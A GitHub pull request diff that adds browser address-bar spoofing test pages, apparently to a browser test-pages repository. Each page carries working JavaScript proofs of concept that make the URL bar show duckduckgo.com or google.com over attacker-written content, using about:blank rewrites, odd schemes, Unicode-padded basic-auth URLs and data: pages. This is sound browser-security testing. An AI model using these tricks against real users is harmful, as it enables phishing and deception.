Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add Address Bar Spoofing Test Cases #169

Merged
merged 7 commits into from
Nov 8, 2023
Merged
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
2 changes: 1 addition & 1 deletion index.html
Original file line number Diff line number Diff line change
@@ -53,8 +53,8 @@ <h2>Browser Features</h2>
<h2>Security</h2>

<ul>
<li><a href="./security/address-bar-spoofing/">Address Bar Spoofing</a></li>
<li><a href="./security/dos-reload.html">Infinite location.reload() loop</a></li>
<li><a href="./security/spoof-js-page-rewrite.html">URL Spoofing - JS page rewrite</a></li>
not-a-rootkit marked this conversation as resolved.
Show resolved Hide resolved
<li><a href="./security/csp-report/index.html">Leak of extension IDs via CSP</a></li>
<li><a href="./security/js-leaks.html">Detect changes to JS objects in global scope</a></li>
<li><a href="./security/badware/phishing.html">An example phishing page</a></li>
22 changes: 22 additions & 0 deletions security/address-bar-spoofing/index.html
Original file line number Diff line number Diff line change
@@ -0,0 +1,22 @@
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Test Pages - Address Bar Spoofing</title>
</head>
<body>
<h1>Address Bar Spoofing Pages</h1>
<ul>
<li><a href="/security/address-bar-spoofing/spoof-about-blank-rewrite.html">About:Blank Rewrite Spoof</a></li>
<li><a href="/security/address-bar-spoofing/spoof-application-scheme.html">Unsupported Application Scheme Spoof</a></li>
<li><a href="/security/address-bar-spoofing/spoof-basicauth-2028.html">Basic Auth Parameter Spoof (\u2028)</a></li>
<li><a href="/security/address-bar-spoofing/spoof-basicauth-2029.html">Basic Auth Parameter Spoof (\u2029)</a></li>
<li><a href="/security/address-bar-spoofing/spoof-basicauth-whitespace.html">Basic Auth Parameter Spoof (Whitespace)</a></li>
<li><a href="/security/address-bar-spoofing/spoof-form-action.html">Form Action Spoof</a></li>
<li><a href="/security/address-bar-spoofing/spoof-js-download-url.html">Download URL Spoof</a></li>
<li><a href="/security/address-bar-spoofing/spoof-js-page-rewrite.html">Unsupported Application Scheme Spoof</a></li>
<li><a href="/security/address-bar-spoofing/spoof-open-b64-html.html">Unsupported Application Scheme Spoof</a></li>
<li><a href="/security/address-bar-spoofing/spoof-unsupported-scheme.html">Unsupported URL Scheme Spoof</a></li>
</ul>
</body>
</html>
29 changes: 29 additions & 0 deletions security/address-bar-spoofing/spoof-about-blank-rewrite.html
Original file line number Diff line number Diff line change
@@ -0,0 +1,29 @@
<!DOCTYPE html>
<html>

<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<title>About:Blank Rewrite Spoof</title>
<script>
not-a-rootkit marked this conversation as resolved.
Show resolved Hide resolved
// eslint-disable-next-line no-unused-vars
function run() {
let win = open("about:blank");
win.document.write("<title>DuckDuckGo - Privacy, Simplified.</title>Not DDG.");
setTimeout(() => {
win.location = "https://duckduckgo.com/";
win.window.stop();
}, 500);
}
</script>
</head>

<body>
<p><a href="../index.html">[Home]</a></p>
This test will try to confuse the browser to show the wrong domain in the URL bar by opening an about:blank page,
rewriting the content, starting a navigation elsewhere and quickly stopping the
navigation using window.stop().
<button id="run" onclick="run()">Start</button>
</body>

</html>
26 changes: 26 additions & 0 deletions security/address-bar-spoofing/spoof-application-scheme.html
Original file line number Diff line number Diff line change
@@ -0,0 +1,26 @@
<!DOCTYPE html>
<html>

<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<title>URL Spoofing - Unsupported Application Scheme</title>
<script>
// eslint-disable-next-line no-unused-vars
function run() {
var t = window.open('filesystem:whatever', 'aa');
t.document.body.innerHTML = '<title>DuckDuckGo - Privacy Simplified</title><h1>Not DDG.</h1>';
}
</script>
</head>

<body>
<p><a href="../index.html">[Home]</a></p>
This test uses an unsupported application scheme and a href target to trick the browser into displaying the href
target as the current address bar value, while actually navigating to an attacker controlled page.
<a id="run" href="https://duckduckgo.com:" target="aa" onclick="setTimeout('run()',100)">
<h1>Start</h1>
</a>
</body>

</html>
23 changes: 23 additions & 0 deletions security/address-bar-spoofing/spoof-basicauth-2028.html
Original file line number Diff line number Diff line change
@@ -0,0 +1,23 @@
<!DOCTYPE html>
<html>

<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<title>URL Spoofing - Basic Auth Whitespace (2028)</title>
<script>
// eslint-disable-next-line no-unused-vars
function run() {
location = `https://www.google.com\u2028@example.com/`
}
</script>
</head>

<body>
<p><a href="../index.html">[Home]</a></p>
This test uses a unicode whitespace character (\u2028) inside the username field of the basicauth portion
of the URL to perform an address bar spoofing attack.
<button id="run" onclick="run()">run</button>
</body>

</html>
23 changes: 23 additions & 0 deletions security/address-bar-spoofing/spoof-basicauth-2029.html
Original file line number Diff line number Diff line change
@@ -0,0 +1,23 @@
<!DOCTYPE html>
<html>

<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<title>URL Spoofing - Basic Auth Whitespace (2029)</title>
<script>
// eslint-disable-next-line no-unused-vars
function run() {
location = `https://www.google.com\u2029@example.com/`
}
</script>
</head>

<body>
<p><a href="../index.html">[Home]</a></p>
This test uses a unicode whitespace character (\u2029) inside the username field of the basicauth portion
of the URL to perform an address bar spoofing attack.
<button id="run" onclick="run()">run</button>
</body>

</html>
24 changes: 24 additions & 0 deletions security/address-bar-spoofing/spoof-basicauth-whitespace.html
Original file line number Diff line number Diff line change
@@ -0,0 +1,24 @@
<!DOCTYPE html>
<html>

<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<title>URL Spoofing - Basic Auth Whitespace Repeated</title>
<script>
// eslint-disable-next-line no-unused-vars
function run() {
var whitespaces = "\u3000".repeat(300);
location = `https://www.google.com${whitespaces}@example.com/`;
}
</script>
</head>

<body>
<p><a href="../index.html">[Home]</a></p>
This test uses 300 repeated unicode whitespace characters inside the username field of the basicauth portion
of the URL to perform an address bar spoofing attack.
<button id="run" onclick="run()">run</button>
</body>

</html>
26 changes: 26 additions & 0 deletions security/address-bar-spoofing/spoof-form-action.html
Original file line number Diff line number Diff line change
@@ -0,0 +1,26 @@
<!DOCTYPE html>
<html>

<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<meta http-equiv="Content-Security-Policy" content="form-action https://duck.co" />
<title>URL Spoofing - Redirect Form Action</title>
<script>
// eslint-disable-next-line no-unused-vars
function run() {
not-a-rootkit marked this conversation as resolved.
Show resolved Hide resolved
document.forms[0].submit();
}
</script>
</head>

<body>
<p><a href="../index.html">[Home]</a></p>
This test uses a form action on a redirect URL to trick the browser into displaying the
redirect URL as the current address bar value, while trying to remain on the current page.
<button id="run" onclick="run()">run</button>
<form action="https://duck.co/">
</form>
</body>

</html>
26 changes: 26 additions & 0 deletions security/address-bar-spoofing/spoof-js-download-url.html
Original file line number Diff line number Diff line change
@@ -0,0 +1,26 @@
<!DOCTYPE html>
<html>

<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<title>URL Spoofing - Download URL</title>
<script>
// eslint-disable-next-line no-unused-vars
function run() {
const w = open()
w.opener = null
w.document.write('<h1>Not Third Party Site.</h1>')
w.location = 'https://bad.third-party.site/features/download/file/pdf'
}
</script>
</head>

<body>
<p><a href="../index.html">[Home]</a></p>
This test uses a download URL for downloading a file to spoof the browser into displaying the download
URL as the current origin while rewriting the document content to spoof the address bar.
<button onclick="run()">Start</button>
</body>

</html>
26 changes: 26 additions & 0 deletions security/address-bar-spoofing/spoof-js-page-rewrite-simple.html
Original file line number Diff line number Diff line change
@@ -0,0 +1,26 @@
<!DOCTYPE html>
<html>

<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<title>URL Spoofing - Simple JS page rewrite</title>
<script>
// eslint-disable-next-line no-unused-vars
function run () {
document.write('Not DDG.<br>');
document.location = 'https://duckduckgo.com:8443';
}
</script>
</head>

<body>
<p><a href="../index.html">[Home]</a></p>

This test will try to confuse the browser to show the wrong domain in the URL bar by rewriting the current page
content and loading a URL that will timeout.

<button onclick="run()">Start</button>
</body>

</html>
31 changes: 31 additions & 0 deletions security/address-bar-spoofing/spoof-open-b64-html.html
Original file line number Diff line number Diff line change
@@ -0,0 +1,31 @@
<!DOCTYPE html>
<html>

<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<title>URL Spoofing - Base64 Document Load</title>
<script>
// eslint-disable-next-line no-unused-vars
function run() {
w = open('data:text/html;base64,PHRpdGxlPkR1Y2tEdWNrR28gLSBQcml2YWN5LCBTaW1wbGlmaWVkPC90aXRsZT48aDE+Tm90IERERzwvaDE+Cg==')
setTimeout(function () {
w.location = 'tel://duckduckgo.com'
setTimeout(function () {
w.history.back()
}, 2100)
}, 2000)
}
</script>
</head>

<body>
<p><a href="../index.html">[Home]</a></p>

This test will try to confuse the browser to show the wrong domain in the URL bar by loading a static Base64
encoded document, rewriting the current page, and then navigating to a tel: URL.

<button onclick="run()">Start</button>
</body>

</html>
24 changes: 24 additions & 0 deletions security/address-bar-spoofing/spoof-unsupported-scheme.html
Original file line number Diff line number Diff line change
@@ -0,0 +1,24 @@
<!DOCTYPE html>
<html>

<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<title>URL Spoofing - Simple Location</title>
<script>
// eslint-disable-next-line no-unused-vars
function run() {
location = "httpx://www.duckduckgo.com";
}
</script>
</head>

<body>
<p><a href="../index.html">[Home]</a></p>

This is the most simple test for URL spoofing. Simply rewrite the current location using an unsupported scheme.

<button onclick="run()">Start</button>
</body>

</html>
35 changes: 0 additions & 35 deletions security/spoof-js-page-rewrite.html

This file was deleted.